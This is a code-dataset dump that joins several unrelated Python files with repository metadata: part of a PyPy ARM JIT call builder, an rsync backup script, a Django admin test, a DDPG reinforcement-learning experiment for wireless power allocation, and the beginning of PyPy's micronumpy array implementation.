if count % 2 != 0:
on_stack += 1
stack_args.append(None)
if on_stack > 0:
self._push_stack_args(stack_args, on_stack*WORD)
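    # Illustrative aside (not part of the original backend): for stack arguments
    # the soft-float calling convention keeps doubles 8-byte aligned, which is
    # what the padding words (None) above achieve.  A hedged example for a
    # stack portion consisting of (int, double):
    #
    #   stack_args -> [int_loc, None, double_loc]   # 1 word + 1 pad + 2 words
    #   on_stack   -> 4 words, i.e. 16 bytes, so sp stays 8-byte aligned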
def prepare_arguments(self):
arglocs = self.arglocs
reg_args = count_reg_args(arglocs)
self._collect_and_push_stack_args(arglocs)
# collect variables that need to go in registers and the registers they
# will be stored in
num = 0
count = 0
non_float_locs = []
non_float_regs = []
float_locs = []
for i in range(reg_args):
arg = arglocs[i]
if arg.type == FLOAT and count % 2 != 0:
num += 1
count = 0
reg = r.caller_resp[num]
if arg.type == FLOAT:
float_locs.append((arg, reg))
else:
non_float_locs.append(arg)
non_float_regs.append(reg)
if arg.type == FLOAT:
num += 2
else:
num += 1
count += 1
# Check that the address of the function we want to call is not
# currently stored in one of the registers used to pass the arguments
        # or on the stack, which we cannot access later
# If this happens to be the case we remap the register to r4 and use r4
# to call the function
if not self.fnloc.is_imm():
non_float_locs.append(self.fnloc)
non_float_regs.append(r.r4)
self.fnloc = r.r4
# remap values stored in core registers
remap_frame_layout(self.asm, non_float_locs, non_float_regs, r.ip)
for loc, reg in float_locs:
self.asm.mov_from_vfp_loc(loc, reg, r.all_regs[reg.value + 1])
class HardFloatCallBuilder(ARMCallbuilder):
next_arg_vfp = 0
next_arg_svfp = 0
def get_next_vfp(self, tp):
assert tp in 'fS'
if tp == 'f':
# 64bit double
i = max(self.next_arg_vfp, (self.next_arg_svfp + 1) >> 1)
if i >= len(r.vfp_argument_regs):
self.next_arg_svfp = 1000 # stop that sequence too
return None
self.next_arg_vfp = i + 1
return r.vfp_argument_regs[i]
else:
# 32bit float
i = self.next_arg_svfp
if not (i & 1): # if i is even
i = max(i, self.next_arg_vfp << 1)
if i >= len(r.svfp_argument_regs):
return None
self.next_arg_svfp = i + 1
return r.svfp_argument_regs[i]
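    # Illustrative aside (not part of the original backend): in the hard-float
    # ABI the single-precision registers s0..s15 overlay the double registers
    # d0..d7 (s[2k] and s[2k+1] alias d[k]), which is why the two counters above
    # are kept consistent via '>> 1' and '<< 1'.  Assuming the register lists
    # hold d0.. and s0.. in order, a hedged allocation example for the argument
    # types (double, float, float) is:
    #
    #   d0 <- the double          (next_arg_vfp becomes 1)
    #   s2 <- the first float     (s0/s1 are skipped, they alias d0)
    #   s3 <- the second float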
def prepare_arguments(self):
non_float_locs = []
non_float_regs = []
float_locs = []
float_regs = []
stack_args = []
singlefloats = None
longlong_mask = 0
arglocs = self.arglocs
argtypes = self.argtypes
r_register_count = 0
on_stack = 0
for i in range(len(arglocs)):
argtype = INT
if i < len(argtypes) and argtypes[i] == 'S':
argtype = argtypes[i]
arg = arglocs[i]
if arg.is_float():
if i < len(argtypes) and argtypes[i] == 'L':
# A longlong argument. It uses two regular argument
# positions, but aligned to an even number. This is
# a bit strange, but it is the case even for registers:
# it can be in r0-r1 or in r2-r3 but not in r1-r2.
assert arg.is_float()
if r_register_count == 0:
# will temporarily load the register into d8
float_locs.append(arg)
float_regs.append(r.d8)
longlong_mask |= 1
r_register_count = 2
continue
elif r_register_count <= 2:
# will temporarily load the register into d9
float_locs.append(arg)
float_regs.append(r.d9)
longlong_mask |= 2
r_register_count = 4
continue
elif r_register_count == 3:
r_register_count = 4
else:
# A 64-bit float argument. Goes into the next free v#
# register, or if none, to the stack aligned to an
# even number of words.
argtype = FLOAT
reg = self.get_next_vfp(argtype)
if reg:
float_locs.append(arg)
assert reg not in float_regs
float_regs.append(reg)
continue
# float or longlong argument that needs to go on the stack
if on_stack & 1: # odd: realign
stack_args.append(None)
on_stack += 1
stack_args.append(arg)
on_stack += 2
elif argtype == 'S':
# Singlefloat (32-bit) argument. Goes into the next free
# v# register, or if none, to the stack in a single word.
if singlefloats is None:
singlefloats = []
tgt = self.get_next_vfp(argtype)
if tgt:
singlefloats.append((arg, tgt))
else: # Singlefloat argument that needs to go on the stack
# treated the same as a regular core register argument
stack_args.append(arg)
on_stack += 1
else:
# Regular one-word argument. Goes into the next register
# free from the list r0, r1, r2, r3, or to the stack.
if r_register_count < len(r.argument_regs):
reg = r.argument_regs[r_register_count]
r_register_count += 1
non_float_locs.append(arg)
non_float_regs.append(reg)
else: # non-float argument that needs to go on the stack
stack_args.append(arg)
on_stack += 1
# align the stack
if on_stack & 1: # odd: realign
stack_args.append(None)
on_stack += 1
self._push_stack_args(stack_args, on_stack*WORD)
# Check that the address of the function we want to call is not
# currently stored in one of the registers used to pass the arguments
        # or on the stack, which we cannot access later
# If this happens to be the case we remap the register to r4 and use r4
# to call the function
if not self.fnloc.is_imm():
non_float_locs.append(self.fnloc)
non_float_regs.append(r.r4)
self.fnloc = r.r4
# remap values stored in vfp registers
remap_frame_layout(self.asm, float_locs, float_regs, r.vfp_ip)
if singlefloats:
for src, dest in singlefloats:
if src.is_float():
assert 0, 'unsupported case'
if src.is_stack():
# use special VLDR for 32bit
self.asm.regalloc_mov(src, r.ip)
src = r.ip
if src.is_imm():
self.mc.gen_load_int(r.ip.value, src.value)
src = r.ip
if src.is_core_reg():
self.mc.VMOV_cs(dest.value, src.value)
# remap values stored in core registers
remap_frame_layout(self.asm, non_float_locs, non_float_regs, r.ip)
if longlong_mask & 1:
self.mc.FMRRD(r.r0.value, r.r1.value, r.d8.value)
if longlong_mask & 2:
self.mc.FMRRD(r.r2.value, r.r3.value, r.d9.value)
def load_result(self):
resloc = self.resloc
if self.restype == 'S':
self.mc.VMOV_sc(resloc.value, r.s0.value)
elif self.restype == 'L':
assert resloc.is_vfp_reg()
self.mc.FMDRR(resloc.value, r.r0.value, r.r1.value)
        # ensure the result is well-formed and stored in the correct location
if resloc is not None and resloc.is_core_reg():
self._ensure_result_bit_extension(resloc,
self.ressize, self.ressign)
def get_result_locs(self):
if self.resloc is None:
return [], []
if self.resloc.is_vfp_reg():
if self.restype == 'L': # long long
return [r.r0, r.r1], []
else:
return [], [r.d0]
assert self.resloc.is_core_reg()
return [r.r0], []
def get_callbuilder(cpu, assembler, fnloc, arglocs,
resloc=r.r0, restype=INT, ressize=WORD, ressigned=True):
if cpu.cpuinfo.hf_abi:
return HardFloatCallBuilder(assembler, fnloc, arglocs, resloc,
restype, ressize, ressigned)
else:
return SoftFloatCallBuilder(assembler, fnloc, arglocs, resloc,
restype, ressize, ressigned)
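# Illustrative usage note (not part of the original module): a hedged sketch of
# how the factory above is typically driven by the surrounding JIT backend;
# 'assembler', 'fnloc' and 'arglocs' are assumed to be provided by that backend
# and are not defined here.
#
#   cb = get_callbuilder(cpu, assembler, fnloc, arglocs)
#   cb.emit()          # prepare arguments, emit BL/BLX, load the result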
| 42.112205
| 91
| 0.557986
|
58cc66384450fe06963dd83c09796e8a5b958d63
| 1,571
|
py
|
Python
|
files_and_folders/backupper/bk.py
|
Xanderamon/python-IT-automation
|
d07c41a3b3102214631cb35bd73d2a2d315c89dc
|
[
"MIT"
] | null | null | null |
files_and_folders/backupper/bk.py
|
Xanderamon/python-IT-automation
|
d07c41a3b3102214631cb35bd73d2a2d315c89dc
|
[
"MIT"
] | null | null | null |
files_and_folders/backupper/bk.py
|
Xanderamon/python-IT-automation
|
d07c41a3b3102214631cb35bd73d2a2d315c89dc
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
import os
import multiprocessing
import subprocess
#In this test /src/ and /dest/ are in the same folder as the script
source = os.path.join(os.getcwd(),"src")
destination = os.path.join(os.getcwd(),"dest")
def get_pathlist(folder):
pathlist = []
#No need for the FULL path of the dir/file
#The source directory is in a global variable
for root,dirs,files in os.walk(folder):
for f in files:
#Extract the sub-folder (if any)
path = root[len(folder):]
#Extract the filename
item = f
#Store the RELATIVE path in a tuple
pathlist.append((path,item))
for d in dirs:
#Extract the sub-folder (if any)
path = root[len(folder):]
#Extract the folder name
item = d
#Store the RELATIVE path in a tuple
pathlist.append((path,item))
#Return the list of tuples
return pathlist
def backup(path):
#Source = root, path[0] = sub-folder, path[1] = file/dir name
#NB: We input the FULL path of the source file/folder
src = os.path.join(source,path[0],path[1])
#Destination = root, path[0] = sub-folder
#NB: We input the destination folder only (no need for the file/folder name)
dest = os.path.join(destination,path[0])
subprocess.call(['rsync', '-azq', src, dest])
if __name__ == "__main__":
src_pathlist = get_pathlist(source)
with multiprocessing.Pool(len(src_pathlist),maxtasksperchild=1) as mpool:
mpool.map(backup,src_pathlist)
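#Illustrative usage note (not part of the original script): assuming the ./src
#and ./dest folders described above exist next to this file, a run is simply
#
#   $ python3 bk.py
#
#and every file/folder found under ./src is rsynced to ./dest by its own
#worker process.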
| 33.425532
| 80
| 0.630172
|
f2b05a1d36df99e204c9873cfbe89878cb7e1370
| 838
|
py
|
Python
|
cms/apps/pages/tests/test_admin_destructive.py
|
cresset-group/cms
|
727b81e40dd1196e85c240e728a7824121163d4d
|
[
"BSD-3-Clause"
] | 13
|
2015-03-13T21:32:16.000Z
|
2020-08-07T08:09:02.000Z
|
cms/apps/pages/tests/test_admin_destructive.py
|
cresset-group/cms
|
727b81e40dd1196e85c240e728a7824121163d4d
|
[
"BSD-3-Clause"
] | 131
|
2015-04-04T11:27:14.000Z
|
2020-10-16T13:39:16.000Z
|
cms/apps/pages/tests/test_admin_destructive.py
|
cresset-group/cms
|
727b81e40dd1196e85c240e728a7824121163d4d
|
[
"BSD-3-Clause"
] | 16
|
2015-06-05T12:56:28.000Z
|
2021-01-06T15:15:53.000Z
|
import sys
from django.conf import settings
from django.contrib import admin
from django.test import TestCase
from ..models import Country, CountryGroup, Page
class TestArticleAdminBase(TestCase):
def test_article_admin(self):
self.assertNotIn(Country, admin.site._registry)
self.assertNotIn(CountryGroup, admin.site._registry)
with self.settings(MIDDLEWARE=['cms.middleware.LocalisationMiddleware']):
module = sys.modules['cms.apps.pages.admin']
del sys.modules['cms.apps.pages.admin']
admin.site.unregister(Page)
from ..admin import page_admin
assert page_admin
self.assertIn(Country, admin.site._registry)
self.assertIn(CountryGroup, admin.site._registry)
sys.modules['cms.apps.pages.admin'] = module
| 28.896552
| 81
| 0.686158
|
540668a27b948a35e360e525034587d9fcaa1c6d
| 111
|
py
|
Python
|
mocasin/gui/__init__.py
|
tud-ccc/mocasin
|
6cf0a169e24d65d0fc859398f181dd500f928340
|
[
"0BSD"
] | 1
|
2022-03-13T19:27:50.000Z
|
2022-03-13T19:27:50.000Z
|
mocasin/tgff/tgffParser/__init__.py
|
tud-ccc/mocasin
|
6cf0a169e24d65d0fc859398f181dd500f928340
|
[
"0BSD"
] | null | null | null |
mocasin/tgff/tgffParser/__init__.py
|
tud-ccc/mocasin
|
6cf0a169e24d65d0fc859398f181dd500f928340
|
[
"0BSD"
] | null | null | null |
# Copyright (C) 2019 TU Dresden
# Licensed under the ISC license (see LICENSE.txt)
#
# Authors: Felix Teweleit
| 22.2
| 50
| 0.738739
|
274bedadf55aa20c412461ba9d4fc9bb02da6a03
| 8,417
|
py
|
Python
|
special_case.py
|
zhiguo-ding/CRNOMA_DDPG
|
8f7acca0a8b2c176e50c262cb006a0f4a8af37a1
|
[
"MIT"
] | 24
|
2020-12-03T07:54:54.000Z
|
2022-03-27T10:44:16.000Z
|
special_case.py
|
3025066980/CRNOMA_DDPG
|
8f7acca0a8b2c176e50c262cb006a0f4a8af37a1
|
[
"MIT"
] | null | null | null |
special_case.py
|
3025066980/CRNOMA_DDPG
|
8f7acca0a8b2c176e50c262cb006a0f4a8af37a1
|
[
"MIT"
] | 16
|
2020-12-03T13:36:12.000Z
|
2022-03-30T10:49:11.000Z
|
"""
Note: This is based on Mofan's code from: https://morvanzhou.github.io/tutorials/
Using:
tensorflow 1.0
This code is used to generate the figures for random fading without averaging (a snapshot).
Simply change K
"""
import tensorflow.compat.v1 as tf
tf.disable_v2_behavior()
import numpy as np
import time
from enviroment import Env_cellular as env
import matplotlib.pyplot as plt
##################### hyper parameters ####################
Pn = 1
K = 10  # the number of grant-based users
MAX_EPISODES = 400
MAX_EP_STEPS = 100
LR_A = 0.002 # learning rate for actor
LR_C = 0.004 # learning rate for critic
GAMMA = 0.9 # reward discount
TAU = 0.01 # soft replacement
MEMORY_CAPACITY = 10000
BATCH_SIZE = 32
############################### DDPG ####################################
class DDPG(object):
def __init__(self, a_dim, s_dim, a_bound,):
self.memory = np.zeros((MEMORY_CAPACITY, s_dim * 2 + a_dim + 1), dtype=np.float32)
self.pointer = 0
self.sess = tf.Session()
self.a_dim, self.s_dim, self.a_bound = a_dim, s_dim, a_bound,
self.S = tf.placeholder(tf.float32, [None, s_dim], 's')
self.S_ = tf.placeholder(tf.float32, [None, s_dim], 's_')
self.R = tf.placeholder(tf.float32, [None, 1], 'r')
self.a = self._build_a(self.S,)
q = self._build_c(self.S, self.a, )
a_params = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope='Actor')
c_params = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope='Critic')
ema = tf.train.ExponentialMovingAverage(decay=1 - TAU) # soft replacement
def ema_getter(getter, name, *args, **kwargs):
return ema.average(getter(name, *args, **kwargs))
target_update = [ema.apply(a_params), ema.apply(c_params)] # soft update operation
a_ = self._build_a(self.S_, reuse=True, custom_getter=ema_getter) # replaced target parameters
q_ = self._build_c(self.S_, a_, reuse=True, custom_getter=ema_getter)
a_loss = - tf.reduce_mean(q) # maximize the q
self.atrain = tf.train.AdamOptimizer(LR_A).minimize(a_loss, var_list=a_params)
with tf.control_dependencies(target_update): # soft replacement happened at here
q_target = self.R + GAMMA * q_
td_error = tf.losses.mean_squared_error(labels=q_target, predictions=q)
self.ctrain = tf.train.AdamOptimizer(LR_C).minimize(td_error, var_list=c_params)
self.sess.run(tf.global_variables_initializer())
def choose_action(self, s):
return self.sess.run(self.a, {self.S: s })[0]
def learn(self):
indices = np.random.choice(min(MEMORY_CAPACITY,self.pointer), size=BATCH_SIZE)
bt = self.memory[indices, :]
bs = bt[:, :self.s_dim]
ba = bt[:, self.s_dim: self.s_dim + self.a_dim]
br = bt[:, -self.s_dim - 1: -self.s_dim]
bs_ = bt[:, -self.s_dim:]
self.sess.run(self.atrain, {self.S: bs})
self.sess.run(self.ctrain, {self.S: bs, self.a: ba, self.R: br, self.S_: bs_})
def store_transition(self, s, a, r, s_):
r = np.reshape(r,(1,1))
a = np.reshape(a,(1,1))
#print(f"state is {s}, action is {a}, reward is {r}, next state is {s_}")
transition = np.hstack((s, a, r, s_))
index = self.pointer % MEMORY_CAPACITY # replace the old memory with new memory
self.memory[index, :] = transition
self.pointer += 1
def _build_a(self, s, reuse=None, custom_getter=None):
trainable = True if reuse is None else False
with tf.variable_scope('Actor', reuse=reuse, custom_getter=custom_getter):
net = tf.layers.dense(s, 64, activation=tf.nn.relu, name='l1', trainable=trainable)
a2 = tf.layers.dense(net, 64, activation=tf.nn.tanh, name='l2', trainable=trainable)
#a3 = tf.layers.dense(a2, 30, activation=tf.nn.tanh, name='l3', trainable=trainable)
a = tf.layers.dense(a2, self.a_dim, activation=tf.nn.tanh, name='a', trainable=trainable)
return tf.multiply(a, self.a_bound, name='scaled_a')
def _build_c(self, s, a, reuse=None, custom_getter=None):
trainable = True if reuse is None else False
with tf.variable_scope('Critic', reuse=reuse, custom_getter=custom_getter):
n_l1 = 64
w1_s = tf.get_variable('w1_s', [self.s_dim, n_l1], trainable=trainable)
w1_a = tf.get_variable('w1_a', [self.a_dim, n_l1], trainable=trainable)
b1 = tf.get_variable('b1', [1, n_l1], trainable=trainable)
net = tf.nn.relu(tf.matmul(s, w1_s) + tf.matmul(a, w1_a) + b1)
net2 = tf.layers.dense(net, 64, activation=tf.nn.relu, name='lx2', trainable=trainable)
#net3 = tf.layers.dense(net2, 30, activation=tf.nn.relu, name='lx3', trainable=trainable)
#not sure about this part
return tf.layers.dense(net2, 1, trainable=trainable) # Q(s,a)
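# Illustrative aside (not part of the original script): the ExponentialMovingAverage
# used in DDPG above is the standard "soft" target-network update.  For every
# target parameter theta_target and online parameter theta, with TAU = 0.01:
#
#   theta_target = (1 - TAU) * theta_target + TAU * theta
#
# so the target actor/critic trail the online networks slowly, which stabilises
# the bootstrapped critic target R + GAMMA * Q'(s', a').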
############################### training ####################################
s_dim = 3  # dimension of states
a_dim = 1  # dimension of action
a_bound = 1  # bound of action
state_am = 10000
locationspace = np.linspace(1,1000, num=K)
location_vector = np.zeros((K, 2))
location_vector[:,1] = locationspace
location_GF = np.array([[1,1]])# np.ones((1, 2))
##### fading for GB user
hnx1 = np.random.randn(K, 2)
hnx2 = np.random.randn(K, 2)
fading_n = hnx1 ** 2 + hnx2 ** 2
#### fading for GF user
h0x1 = np.random.randn(1, 1)
h0x2 = np.random.randn(1, 1)
fading_0 = h0x1[0,0] ** 2 + h0x2[0,0] ** 2
myenv = env( MAX_EP_STEPS, s_dim, location_vector,location_GF,K,Pn, fading_n, fading_0)
#myenv = env(P0, MAX_EP_STEPS, s_dim, location_vector,location_GF,K)
#myenv = env(P0,MAX_EP_STEPS,s_dim)
ddpg = DDPG(a_dim, s_dim, a_bound)
var = 1 # control exploration
t1 = time.time()
ep_rewardall = []
ep_rewardall_greedy = []
ep_rewardall_random = []
for i in range(MAX_EPISODES):
batter_ini = myenv.reset()
s = myenv.channel_sequence[i%myenv.K,:].tolist()
#s.append(myenv.h0)
s.append(batter_ini)
s = np.reshape(s,(1,s_dim))
s = s*state_am #amplify the state
s_greedy = s
s_random = s
#print(s[0,0:2])
ep_reward = 0
ep_reward_random = 0
ep_reward_greedy = 0
for j in range(MAX_EP_STEPS):
# Add exploration noise
a = ddpg.choose_action(s)
a = np.clip(np.random.normal(a, var), 0, 1) # add randomness to action selection for exploration
r, s_, done = myenv.step(a,s/state_am,j)
s_ = s_ * state_am
ddpg.store_transition(s, a, r, s_)
if var >0.1:
var *= .9998 # decay the action randomness
ddpg.learn()
s = s_
ep_reward += r
##### greedy
r_greedy, s_next_greedy, done = myenv.step_greedy(s_greedy/state_am, j)
s_greedy = s_next_greedy*state_am
ep_reward_greedy += r_greedy
##### random
r_random, s_next_random, done = myenv.step_random(s_random/state_am, j)
s_random = s_next_random*state_am
ep_reward_random += r_random
if j == MAX_EP_STEPS-1:
#print(f"Episode: {i}, reward is {ep_reward}, and Explore is {var}")
print('Episode:', i, ' Reward: %i' % int(ep_reward),' Reward Greedy: %i' % int(ep_reward_greedy),' Reward random: %i' % int(ep_reward_random), 'Explore: %.2f' % var )
#print(myenv.location)
# if ep_reward > -300:RENDER = True
break
ep_reward = np.reshape(ep_reward/MAX_EP_STEPS, (1,))
ep_rewardall.append(ep_reward)
ep_reward_greedy = np.reshape(ep_reward_greedy/MAX_EP_STEPS, (1,))
ep_rewardall_greedy.append(ep_reward_greedy)
ep_reward_random = np.reshape(ep_reward_random/MAX_EP_STEPS, (1,))
ep_rewardall_random.append(ep_reward_random)
#print(s_)
print('Running time: ', time.time() - t1)
print(f"{ep_reward} ")
print(ep_rewardall)
plt.plot(ep_rewardall, "^-", label='DDPG: rewards')
plt.plot(ep_rewardall_greedy, "+:", label='Greedy: rewards')
plt.plot(ep_rewardall_random, "o--", label='Random: rewards')
plt.xlabel("Episode")
plt.ylabel("Episodic Reward - Average Data Rate (NPCU)")
plt.legend( loc=3, ncol=2)
plt.show()
''' Save final results'''
#np.savez_compressed('data_snapshot', ep_rewardall=ep_rewardall, ep_rewardall_greedy=ep_rewardall_greedy, ep_rewardall_random=ep_rewardall_random)
| 38.43379
| 178
| 0.634668
|
bcbb8189e5466f03064f9ba612c54c028e53d20f
| 30,924
|
py
|
Python
|
pypy/module/micronumpy/concrete.py
|
SeraphRoy/PyPy-Functional
|
e825dce7f7c484fa666566974a93ed5d59fb73be
|
[
"Apache-2.0",
"OpenSSL"
] | null | null | null |
pypy/module/micronumpy/concrete.py
|
SeraphRoy/PyPy-Functional
|
e825dce7f7c484fa666566974a93ed5d59fb73be
|
[
"Apache-2.0",
"OpenSSL"
] | null | null | null |
pypy/module/micronumpy/concrete.py
|
SeraphRoy/PyPy-Functional
|
e825dce7f7c484fa666566974a93ed5d59fb73be
|
[
"Apache-2.0",
"OpenSSL"
] | null | null | null |
from pypy.interpreter.error import oefmt
from rpython.rlib import jit, rgc
from rpython.rlib.rarithmetic import ovfcheck
from rpython.rlib.listsort import make_timsort_class
from rpython.rlib.buffer import Buffer
from rpython.rlib.debug import make_sure_not_resized
from rpython.rlib.rstring import StringBuilder
from rpython.rlib.rawstorage import alloc_raw_storage, free_raw_storage, \
raw_storage_getitem, raw_storage_setitem, RAW_STORAGE
from rpython.rtyper.lltypesystem import rffi, lltype, llmemory
from pypy.module.micronumpy import support, loop, constants as NPY
from pypy.module.micronumpy.base import convert_to_array, W_NDimArray, \
ArrayArgumentException, W_NumpyObject
from pypy.module.micronumpy.iterators import ArrayIter
from pypy.module.micronumpy.strides import (
IntegerChunk, SliceChunk, NewAxisChunk, EllipsisChunk, BooleanChunk,
new_view, calc_strides, calc_new_strides, shape_agreement,
calculate_broadcast_strides, calc_backstrides, calc_start, is_c_contiguous,
is_f_contiguous)
from rpython.rlib.objectmodel import keepalive_until_here
TimSort = make_timsort_class()
class StrideSort(TimSort):
'''
    argsort (return the indices that would sort) a list of strides
'''
def __init__(self, rangelist, strides, order):
self.strides = strides
self.order = order
TimSort.__init__(self, rangelist)
def lt(self, a, b):
if self.order == NPY.CORDER:
return self.strides[a] <= self.strides[b]
return self.strides[a] < self.strides[b]
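# Illustrative aside (not part of the original module): StrideSort argsorts a
# list of strides.  Ignoring the CORDER/FORTRANORDER tie-breaking detail, a
# hedged plain-Python equivalent of the call made in astype() below is:
#
#   order = sorted(range(len(strides)), key=lambda i: strides[i])
#
# astype() then walks the indices in that order to rebuild contiguous strides
# while preserving the relative memory layout of the original array.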
class BaseConcreteArray(object):
_immutable_fields_ = ['dtype?', 'storage', 'start', 'size', 'shape[*]',
'strides[*]', 'backstrides[*]', 'order', 'gcstruct',
'flags']
start = 0
parent = None
flags = 0
# JIT hints that length of all those arrays is a constant
def get_shape(self):
shape = self.shape
jit.hint(len(shape), promote=True)
return shape
def get_strides(self):
strides = self.strides
jit.hint(len(strides), promote=True)
return strides
def get_backstrides(self):
backstrides = self.backstrides
jit.hint(len(backstrides), promote=True)
return backstrides
def get_flags(self):
return self.flags
def getitem(self, index):
return self.dtype.read(self, index, 0)
def getitem_bool(self, index):
return self.dtype.read_bool(self, index, 0)
def setitem(self, index, value):
self.dtype.store(self, index, 0, value)
@jit.unroll_safe
def setslice(self, space, arr):
if arr.get_size() == 1:
# we can always set self[:] = scalar
pass
elif len(arr.get_shape()) > len(self.get_shape()):
# record arrays get one extra dimension
if not self.dtype.is_record() or \
len(arr.get_shape()) > len(self.get_shape()) + 1:
raise oefmt(space.w_ValueError,
"could not broadcast input array from shape "
"(%s) into shape (%s)",
','.join([str(x) for x in arr.get_shape()]),
','.join([str(x) for x in self.get_shape()]),
)
shape = shape_agreement(space, self.get_shape(), arr)
impl = arr.implementation
if impl.storage == self.storage:
impl = impl.copy(space)
loop.setslice(space, shape, self, impl)
def get_size(self):
return self.size // self.dtype.elsize
def get_storage_size(self):
return self.size
def reshape(self, orig_array, new_shape, order=NPY.ANYORDER):
# Since we got to here, prod(new_shape) == self.size
order = support.get_order_as_CF(self.order, order)
new_strides = None
if self.size == 0:
new_strides, _ = calc_strides(new_shape, self.dtype, order)
else:
if len(self.get_shape()) == 0:
new_strides = [self.dtype.elsize] * len(new_shape)
else:
new_strides = calc_new_strides(new_shape, self.get_shape(),
self.get_strides(), order)
if new_strides is None or len(new_strides) != len(new_shape):
return None
if new_strides is not None:
# We can create a view, strides somehow match up.
new_backstrides = calc_backstrides(new_strides, new_shape)
assert isinstance(orig_array, W_NDimArray) or orig_array is None
return SliceArray(self.start, new_strides, new_backstrides,
new_shape, self, orig_array)
return None
def get_view(self, space, orig_array, dtype, new_shape, strides=None, backstrides=None):
if not strides:
strides, backstrides = calc_strides(new_shape, dtype,
self.order)
return SliceArray(self.start, strides, backstrides, new_shape,
self, orig_array, dtype=dtype)
def get_real(self, space, orig_array):
strides = self.get_strides()
backstrides = self.get_backstrides()
if self.dtype.is_complex():
dtype = self.dtype.get_float_dtype(space)
return SliceArray(self.start, strides, backstrides,
self.get_shape(), self, orig_array, dtype=dtype)
return SliceArray(self.start, strides, backstrides,
self.get_shape(), self, orig_array)
def set_real(self, space, orig_array, w_value):
tmp = self.get_real(space, orig_array)
tmp.setslice(space, convert_to_array(space, w_value))
def get_imag(self, space, orig_array):
strides = self.get_strides()
backstrides = self.get_backstrides()
if self.dtype.is_complex():
dtype = self.dtype.get_float_dtype(space)
return SliceArray(self.start + dtype.elsize, strides, backstrides,
self.get_shape(), self, orig_array, dtype=dtype)
impl = NonWritableArray(self.get_shape(), self.dtype, self.order,
strides, backstrides)
if not self.dtype.is_flexible():
impl.fill(space, self.dtype.box(0))
return impl
def set_imag(self, space, orig_array, w_value):
tmp = self.get_imag(space, orig_array)
tmp.setslice(space, convert_to_array(space, w_value))
# -------------------- applevel get/setitem -----------------------
@jit.unroll_safe
def _lookup_by_index(self, space, view_w):
item = self.start
strides = self.get_strides()
for i, w_index in enumerate(view_w):
if space.isinstance_w(w_index, space.w_slice):
raise IndexError
idx = support.index_w(space, w_index)
if idx < 0:
idx = self.get_shape()[i] + idx
if idx < 0 or idx >= self.get_shape()[i]:
raise oefmt(space.w_IndexError,
"index %d is out of bounds for axis %d with size "
"%d", idx, i, self.get_shape()[i])
item += idx * strides[i]
return item
@jit.unroll_safe
def _lookup_by_unwrapped_index(self, space, lst):
item = self.start
shape = self.get_shape()
strides = self.get_strides()
assert len(lst) == len(shape)
for i, idx in enumerate(lst):
if idx < 0:
idx = shape[i] + idx
if idx < 0 or idx >= shape[i]:
raise oefmt(space.w_IndexError,
"index %d is out of bounds for axis %d with size "
"%d", idx, i, self.get_shape()[i])
item += idx * strides[i]
return item
def getitem_index(self, space, index):
return self.getitem(self._lookup_by_unwrapped_index(space, index))
def setitem_index(self, space, index, value):
self.setitem(self._lookup_by_unwrapped_index(space, index), value)
@jit.unroll_safe
def _single_item_index(self, space, w_idx):
""" Return an index of single item if possible, otherwise raises
IndexError
"""
if (space.isinstance_w(w_idx, space.w_text) or
space.isinstance_w(w_idx, space.w_slice) or
space.is_w(w_idx, space.w_None)):
raise IndexError
if isinstance(w_idx, W_NDimArray) and not w_idx.is_scalar():
raise ArrayArgumentException
shape = self.get_shape()
shape_len = len(shape)
view_w = None
if space.isinstance_w(w_idx, space.w_list):
raise ArrayArgumentException
if space.isinstance_w(w_idx, space.w_tuple):
view_w = space.fixedview(w_idx)
if len(view_w) != shape_len:
raise IndexError
# check for arrays
for w_item in view_w:
if (isinstance(w_item, W_NDimArray) or
space.isinstance_w(w_item, space.w_list)):
raise ArrayArgumentException
elif space.is_w(w_item, space.w_Ellipsis):
raise IndexError
return self._lookup_by_index(space, view_w)
if shape_len == 0:
raise oefmt(space.w_IndexError, "too many indices for array")
elif shape_len > 1:
raise IndexError
idx = support.index_w(space, w_idx)
return self._lookup_by_index(space, [space.newint(idx)])
@jit.unroll_safe
def _prepare_slice_args(self, space, w_idx):
from pypy.module.micronumpy import boxes
if space.isinstance_w(w_idx, space.w_text):
raise oefmt(space.w_IndexError, "only integers, slices (`:`), "
"ellipsis (`...`), numpy.newaxis (`None`) and integer or "
"boolean arrays are valid indices")
if space.isinstance_w(w_idx, space.w_slice):
if len(self.get_shape()) == 0:
raise oefmt(space.w_ValueError, "cannot slice a 0-d array")
return [SliceChunk(w_idx), EllipsisChunk()]
elif space.isinstance_w(w_idx, space.w_int):
return [IntegerChunk(w_idx), EllipsisChunk()]
elif isinstance(w_idx, W_NDimArray) and w_idx.is_scalar():
w_idx = w_idx.get_scalar_value().item(space)
if not space.isinstance_w(w_idx, space.w_int) and \
not space.isinstance_w(w_idx, space.w_bool):
raise oefmt(space.w_IndexError,
"arrays used as indices must be of integer (or "
"boolean) type")
return [IntegerChunk(w_idx), EllipsisChunk()]
elif space.is_w(w_idx, space.w_None):
return [NewAxisChunk(), EllipsisChunk()]
result = []
has_ellipsis = False
has_filter = False
for w_item in space.fixedview(w_idx):
if space.is_w(w_item, space.w_Ellipsis):
if has_ellipsis:
# in CNumPy, this is only a deprecation warning
raise oefmt(space.w_ValueError,
"an index can only have a single Ellipsis (`...`); "
"replace all but one with slices (`:`).")
result.append(EllipsisChunk())
has_ellipsis = True
elif space.is_w(w_item, space.w_None):
result.append(NewAxisChunk())
elif space.isinstance_w(w_item, space.w_slice):
result.append(SliceChunk(w_item))
elif isinstance(w_item, W_NDimArray) and w_item.get_dtype().is_bool():
if has_filter:
# in CNumPy, the support for this is incomplete
raise oefmt(space.w_ValueError,
"an index can only have a single boolean mask; "
"use np.take or create a sinlge mask array")
has_filter = True
result.append(BooleanChunk(w_item))
elif isinstance(w_item, boxes.W_GenericBox):
result.append(IntegerChunk(w_item.descr_int(space)))
else:
result.append(IntegerChunk(w_item))
if not has_ellipsis:
result.append(EllipsisChunk())
return result
def descr_getitem(self, space, orig_arr, w_index):
try:
item = self._single_item_index(space, w_index)
return self.getitem(item)
except IndexError:
# not a single result
chunks = self._prepare_slice_args(space, w_index)
copy = False
if isinstance(chunks[0], BooleanChunk):
# numpy compatibility
copy = True
w_ret = new_view(space, orig_arr, chunks)
if copy:
w_ret = w_ret.descr_copy(space, space.newint(w_ret.get_order()))
return w_ret
def descr_setitem(self, space, orig_arr, w_index, w_value):
try:
item = self._single_item_index(space, w_index)
self.setitem(item, self.dtype.coerce(space, w_value))
except IndexError:
